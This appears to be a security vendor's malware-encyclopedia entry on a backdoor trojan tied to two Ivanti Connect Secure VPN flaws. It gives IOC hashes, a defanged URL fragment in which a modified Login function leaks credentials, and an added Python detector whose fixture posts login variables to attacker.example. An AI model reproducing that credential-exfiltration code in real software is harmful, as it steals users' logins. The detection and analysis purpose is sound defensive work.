JS/Praw.WIR!tr

Analysis

JS/Praw.WIR!tr is a generic detection for a backdoor trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:

  • This malware is related to the exploitation of two vulnerabilities, CVE-2023-46805 and CVE-2024-21887, targeting Ivanti Connect Secure VPN.
  • Remote code execution (RCE) and unauthenticated command execution can be achieved upon successful exploitation.
  • The "Login" function is modified to POST user credentials to the attacker-controlled domain. An example is shown below:
    • hxxps://[REMOVED].fr/IMG/xml.php?a=" + a +"&b="+ b+"&c="+c
  • This malware has been associated with the following third-party articles/advisories:
    • https://nvd.nist.gov/vuln/detail/CVE-2023-46805
    • https://nvd.nist.gov/vuln/detail/CVE-2024-21887
  • The following are some of the near/exact IOCs (file hashes) associated with this detection:
    • Md5: 2ec505088b942c234f39a37188e80d7a
      Sha256: d4de1b866f94cdc43e55fab932880da1f4e9c7406bb17926e30baa9b7b824ecb
    • Md5: e8489983d73ed30a4240a14b1f161254
      Sha256: e1d0ccfb7f1c46c7b8b8b154c97bac33f3ba89dae6481464cbe1448aca1e9dea
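The modified "Login" function described above posts the credentials to an absolute, attacker-controlled URL whose query string is built by concatenating the function's variables. The scanner below is an added example (not Fortinet's detection logic) that flags that shape in JavaScript source; the sample inputs and the host `attacker.example` are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed samples: a benign login handler that posts to a relative endpoint,
# and one modified to leak credentials in the URL shape quoted in the entry above.
CLEAN_JS = 'function Login(a, b, c) { return submitForm("/dana-na/auth/login.cgi", a, b, c); }'
MODIFIED_JS = (
    'function Login(a, b, c) {\n'
    '  var x = new XMLHttpRequest();\n'
    '  x.open("POST", "https://attacker.example/IMG/xml.php?a=" + a +"&b="+ b+"&c="+c);\n'
    '  x.send();\n'
    '  return submitForm("/dana-na/auth/login.cgi", a, b, c);\n'
    '}'
)

# A string literal holding an absolute URL that already carries a query string.
URL_LITERAL = re.compile(r'"(https?://[^"\s]*\?[^"\s]*)"')
# One link of a JavaScript "+" chain: another string literal or an identifier.
CHAIN_LINK = re.compile(r'\s*\+\s*(?:"([^"]*)"|([A-Za-z_$][\w$]*))')


def find_credential_exfil(js_source: str) -> List[Dict[str, object]]:
    """Return every absolute URL literal that is concatenated with variables.

    A login handler is expected to post to the appliance's own relative path;
    an absolute URL whose query string is assembled from variables is the
    credential-exfiltration pattern this detection describes.
    """
    hits = []
    for m in URL_LITERAL.finditer(js_source):
        pos, variables = m.end(), []
        link = CHAIN_LINK.match(js_source, pos)
        while link:
            if link.group(2):            # identifier rather than a string piece
                variables.append(link.group(2))
            pos = link.end()
            link = CHAIN_LINK.match(js_source, pos)
        if variables:
            # Name of the nearest function declaration preceding the literal.
            decl = re.findall(r'function\s+([A-Za-z_$][\w$]*)', js_source[:m.start()])
            hits.append({"url": m.group(1), "variables": variables,
                         "in_login": bool(decl) and decl[-1] == "Login"})
    return hits


if __name__ == "__main__":
    for hit in find_credential_exfil(MODIFIED_JS):
        print(hit)   # url, the leaked variables, and whether it sits inside Login
```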


Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiGate
Extended
FortiClient
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2024-04-24 92.03667
2024-03-07 92.02216
2024-02-01 92.01190
2024-02-01 92.01187